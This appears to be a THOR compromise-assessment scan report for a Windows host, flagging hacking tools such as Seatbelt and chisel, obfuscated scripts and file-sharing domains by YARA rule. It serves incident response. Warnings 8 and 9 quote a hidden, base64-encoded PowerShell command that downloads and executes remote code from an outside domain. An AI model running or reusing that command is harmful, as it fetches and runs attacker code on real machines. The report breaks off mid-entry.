|
|
|
Errors |
---|
Alerts | |
---|---|
Alert 1
|
Sep 10 12:36:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
94
FILE:
E:\Windows\SysWOW64\Seatbelt.exe
EXT:
.exe
TYPE:
EXE
SIZE:
615936
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Sep 3 09:22:55.814 2024
MODIFIED:
Tue Sep 3 09:22:55.814 2024
ACCESSED:
Tue Sep 3 13:11:26.148 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
DESC:
Seatbelt
LEGAL_COPYRIGHT:
Copyright © 2018
PRODUCT:
Seatbelt
ORIGINAL_NAME:
Seatbelt.exe
INTERNAL_NAME:
Seatbelt.exe
IMPHASH:
f34d5f2d4577ed6d9ceec516c1f5a744
REASON_1:
YARA rule HKTL_SeatBelt_ASCII_Art_Feb22_1 / Detects Seatbelt tool on disk or loaded into memory based on a very specific ASCII art image
SUBSCORE_1:
85
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-26
TAGS_1:
HKTL
RULENAME_1: HKTL_SeatBelt_ASCII_Art_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule HKTL_Seatbelt_Dec20_1 / Detects red team tools from FireEye's toolset
SUBSCORE_2:
75
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2020-12-09
TAGS_2:
EXE, HKTL
RULENAME_2: HKTL_Seatbelt_Dec20_1
AUTHOR_2:
Florian Roth
REASONS_COUNT:
7
|
Alert 2
|
Sep 10 12:36:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
90
FILE:
E:\Windows\SysWOW64\chisel.exe
EXT:
.exe
TYPE:
EXE
SIZE:
9006080
FIRSTBYTES:
4d5a90000300000004000000ffff00008b000000 / MZ
CREATED:
Tue Sep 3 09:36:06.796 2024
MODIFIED:
Tue Sep 3 09:36:06.796 2024
ACCESSED:
Tue Sep 3 13:11:25.414 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
IMPHASH:
4f2f006e2ecf7172ad368f8289dc96c1
REASON_1:
YARA rule HKTL_Chisel_Feb22_1 / Detects TCP/UDP tunneling tool Chisel often used by threat groups
SUBSCORE_1:
80
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-01
TAGS_1:
EXE, HKTL, T1071_004
RULENAME_1: HKTL_Chisel_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule HKTL_PUA_Chisel_TCP_Tunneling_Oct20_1 / Detects Chisel TCP Tunneling tool
SUBSCORE_2:
75
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2020-10-05
TAGS_2:
EXE, HKTL, T1071_004
RULENAME_2: HKTL_PUA_Chisel_TCP_Tunneling_Oct20_1
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3
|
Alert 3
|
Sep 10 12:37:45 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
85
FILE:
E:\Windows\SysWOW64\s.txt
EXT:
.txt
TYPE:
UNKNOWN
SIZE:
450544
FIRSTBYTES:
0a0a202020202020202020202020202020202020 /
CREATED:
Tue Sep 3 09:23:34.642 2024
MODIFIED:
Tue Sep 3 09:25:29.294 2024
ACCESSED:
Tue Sep 3 09:28:18.102 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule HKTL_SeatBelt_ASCII_Art_Feb22_1 / Detects Seatbelt tool on disk or loaded into memory based on a very specific ASCII art image
SUBSCORE_1:
85
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-26
TAGS_1:
HKTL
RULENAME_1: HKTL_SeatBelt_ASCII_Art_Feb22_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warnings | |
---|---|
Warning 1
|
Sep 10 12:03:26 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.
|
Warning 2
|
Sep 10 12:03:26 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.
|
Warning 3
|
Sep 10 12:14:04 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
76
FILE:
E:\Program Files\Microsoft\MsEdge\MicrosoftEdgeInstaller.vbs
EXT:
.vbs
TYPE:
UNKNOWN
SIZE:
4178
FIRSTBYTES:
64494d2056556a4656566463584470736457516a / dIM VUjFVVdcXDpsdWQj
CREATED:
Wed Aug 7 08:50:58.000 2024
MODIFIED:
Wed Aug 7 08:50:58.000 2024
ACCESSED:
Tue Sep 3 09:04:48.231 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule Casing_Anomaly_Split_1 / Detects suspicious casing of split statement
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-01-18
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059
RULENAME_1: Casing_Anomaly_Split_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule Casing_Anomaly_Execute / Detects suspicious casing of execute
SUBSCORE_2:
60
REF_2:
Internal Research - T2T
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2018-04-17
TAGS_2:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059
RULENAME_2: Casing_Anomaly_Execute
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3
|
Warning 4
|
Sep 10 12:20:54 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Program Files (x86)\Xen PV Drivers\bin\uninstall.vbs
EXT:
.vbs
TYPE:
UNKNOWN
SIZE:
22629
FIRSTBYTES:
2727272727272727272727272727272727272727 / ''''''''''''''''''''
CREATED:
Thu Oct 20 13:10:58.000 2016
MODIFIED:
Thu Oct 20 13:10:58.000 2016
ACCESSED:
Tue Jul 23 12:54:33.068 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_Recon_Command_Combo_Jun21_1 / Detects suspicious combination of commands often used in Pentest reconnaissance script
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-06-22
TAGS_1:
ANOMALY, SCRIPT, SUSP, T1105, T1197
RULENAME_1: SUSP_Recon_Command_Combo_Jun21_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 5
|
Sep 10 12:21:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
82
FILE:
E:\ProgramData\Microsoft\GroupPolicy\Users\S-1-5-21-2213792943-3978625667-3641601853-1124\DataStore\0\SysVol\MercuryLark.corp\Policies\{0D3199A7-9F17-4413-8579-06CECEBB3E24}\User\Scripts\Logon\UpdatePersonalCert.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
24206121
FIRSTBYTES:
2320446566696e6520746865206865782d656e63 / # Define the hex-enc
CREATED:
Tue Sep 3 12:20:56.121 2024
MODIFIED:
Mon Sep 2 17:42:49.000 2024
ACCESSED:
Tue Sep 3 16:40:39.685 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
BUILTIN\Administrators
REASON_1:
YARA rule SUSP_Encoded_GetCurrentThreadId_FileOnly / Detects encoded keyword - GetCurrentThreadId
SUBSCORE_1:
70
REF_1:
Internal Research - Permutator
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-01-19
TAGS_1:
SCRIPT, SUSP, T1027
RULENAME_1: SUSP_Encoded_GetCurrentThreadId_FileOnly
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Encoded_GetProcAddress / Detects encoded keyword - GetProcAddress
SUBSCORE_2:
60
REF_2:
Internal Research - Permutator
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2019-03-03
TAGS_2:
FILE, SUSP, T1027
RULENAME_2: SUSP_Encoded_GetProcAddress
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3
|
Warning 6
|
Sep 10 12:21:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\ProtectionManagement.dll
EXT:
.dll
TYPE:
EXE
SIZE:
808216
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Jul 23 02:59:07.744 2024
MODIFIED:
Tue Jul 23 02:59:02.094 2024
ACCESSED:
Tue Jul 23 02:59:09.182 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:C / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F / NT SERVICE\TrustedInstaller:F
OWNER:
NT AUTHORITY\SYSTEM
COMPANY:
Microsoft Corporation
DESC:
Protection Management WMIv2 Provider
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
ProtectionManagement.dll.mui
INTERNAL_NAME:
ProtectionManagement
IMPHASH:
12ecfd005b591254748953a418743600
REASON_1:
YARA rule SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1 / Detects PowerShell Cmdlet parameters to define Windows Defender exclusions
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-04-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 7
|
Sep 10 12:21:43 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24070.5-0\ProtectionManagement.dll
EXT:
.dll
TYPE:
EXE
SIZE:
808344
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Wed Aug 7 23:34:40.030 2024
MODIFIED:
Wed Aug 7 23:34:32.909 2024
ACCESSED:
Tue Sep 3 09:12:08.384 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:C / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F / NT SERVICE\TrustedInstaller:F
OWNER:
NT AUTHORITY\SYSTEM
COMPANY:
Microsoft Corporation
DESC:
Protection Management WMIv2 Provider
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
ProtectionManagement.dll.mui
INTERNAL_NAME:
ProtectionManagement
IMPHASH:
12ecfd005b591254748953a418743600
REASON_1:
YARA rule SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1 / Detects PowerShell Cmdlet parameters to define Windows Defender exclusions
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-04-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
|
Warning 8
|
Sep 10 12:21:55 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
2024-09-03T12:04:32.557 Engine:command line reported as lowfi: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe(powershell.exe powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=)
SCORE:
88
FILE:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
LOG_MODIFIED:
Tue Sep 3 09:12:54 2024
LOG_ACCESSED:
Tue Sep 3 09:12:54 2024
LOG_CREATED:
Tue Jun 4 02:25:40 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
RULENAME_1: SUSP_PS1_Base64_Encoded_Pattern_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXISTS_1:
yes
TYPE_1:
EXE
SIZE_1:
431104
FIRSTBYTES_1:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED_1:
Sat Sep 15 07:14:15.943 2018
OWNER_1:
NT SERVICE\TrustedInstaller
COMPANY_1:
Microsoft Corporation
DESC_1:
Windows PowerShell
LEGAL_COPYRIGHT_1:
© Microsoft Corporation. All rights reserved.
PRODUCT_1:
Microsoft® Windows® Operating System
ORIGINAL_NAME_1:
PowerShell.EXE.MUI
INTERNAL_NAME_1:
POWERSHELL
IMPHASH_1:
d1a922c94a1f407cb2bbcad033c8ed7a
FILE_2:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
EXISTS_2:
yes
TYPE_2:
UTF16-Encoded File LE
SIZE_2:
25734294
FIRSTBYTES_2:
fffe0d000a002d002d002d002d002d002d002d00 / -------
CREATED_2:
Tue Jun 4 02:25:40.385 2024
OWNER_2:
NT AUTHORITY\SYSTEM
|
Warning 9
|
Sep 10 12:21:55 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
2024-09-03T12:04:35.558 Engine:command line reported as lowfi: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe(C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=)
SCORE:
88
FILE:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
LOG_MODIFIED:
Tue Sep 3 09:12:54 2024
LOG_ACCESSED:
Tue Sep 3 09:12:54 2024
LOG_CREATED:
Tue Jun 4 02:25:40 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
RULENAME_1: SUSP_PS1_Base64_Encoded_Pattern_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXISTS_1:
yes
TYPE_1:
EXE
SIZE_1:
431104
FIRSTBYTES_1:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED_1:
Sat Sep 15 07:14:15.943 2018
OWNER_1:
NT SERVICE\TrustedInstaller
COMPANY_1:
Microsoft Corporation
DESC_1:
Windows PowerShell
LEGAL_COPYRIGHT_1:
© Microsoft Corporation. All rights reserved.
PRODUCT_1:
Microsoft® Windows® Operating System
ORIGINAL_NAME_1:
PowerShell.EXE.MUI
INTERNAL_NAME_1:
POWERSHELL
IMPHASH_1:
d1a922c94a1f407cb2bbcad033c8ed7a
FILE_2:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
EXISTS_2:
yes
TYPE_2:
UTF16-Encoded File LE
SIZE_2:
25734294
FIRSTBYTES_2:
fffe0d000a002d002d002d002d002d002d002d00 / -------
CREATED_2:
Tue Jun 4 02:25:40.385 2024
OWNER_2:
NT AUTHORITY\SYSTEM
|
Warning 10
|
Sep 10 12:22:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
86
FILE:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
EXT:
.log
TYPE:
UTF16-Encoded File LE
SIZE:
25734294
FIRSTBYTES:
fffe0d000a002d002d002d002d002d002d002d00 / -------
CREATED:
Tue Jun 4 02:25:40.385 2024
MODIFIED:
Tue Sep 3 09:12:54.549 2024
ACCESSED:
Tue Sep 3 09:12:54.549 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F / NT SERVICE\TrustedInstaller:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-07-19
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Encoded_PS_DownloadString / Detects encoded keyword - .DownloadString(
SUBSCORE_2:
70
REF_2:
Internal Research - Permutator
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2019-02-28
TAGS_2:
FILE, SCRIPT, SUSP, T1027, T1059_001
RULENAME_2: SUSP_Encoded_PS_DownloadString
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5
|
Warning 11
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"gofile.io": "{\"Tier1\": [6061, 5938], \"Tier2\": [5952, 7252, 5277, 7989]}",
SCORE:
70
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_gofile_io / Cloud file sharing https://twitter.com/BushidoToken/status/1691795030841680093?s=20
SUBSCORE_1:
70
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_gofile_io
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Warning 12
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"mega.nz": "{\"Tier1\": [6061, 5938, 8223], \"Tier2\": [7989, 236, 4915, 5277, 8223]}",
SCORE:
60
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_SUSP_Domain_File_Transfer_Service_Aug23 / Detects suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, SUSP, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Warning 13
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"pastebin.com": "{\"Tier1\": [6061], \"Tier2\": []}",
SCORE:
60
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_SUSP_Domain_File_Transfer_Service_Aug23 / Detects suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, SUSP, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Warning 14
|
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"www.mediafire.com": "{\"Tier1\": [6061], \"Tier2\": [5952, 7989, 5277, 236, 4915, 4068]}",
SCORE:
60
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_SUSP_Domain_File_Transfer_Service_Aug23 / Detects suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, SUSP, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
|
Warning 15
|
Sep 10 12:27:48 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal.tar\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:01:29.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 16
|
Sep 10 12:27:48 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal_absolute.tar\tmp\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:46:59.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
|
Warning 17
|
Sep 10 12:28:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_utils_Ansible.Become\library\ansible_become_tests.ps1
EXT:
.ps1
TYPE:
Script
SIZE:
47988
FIRSTBYTES:
2321706f7765727368656c6c0a0a23416e736962 / #!powershell #Ansib
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
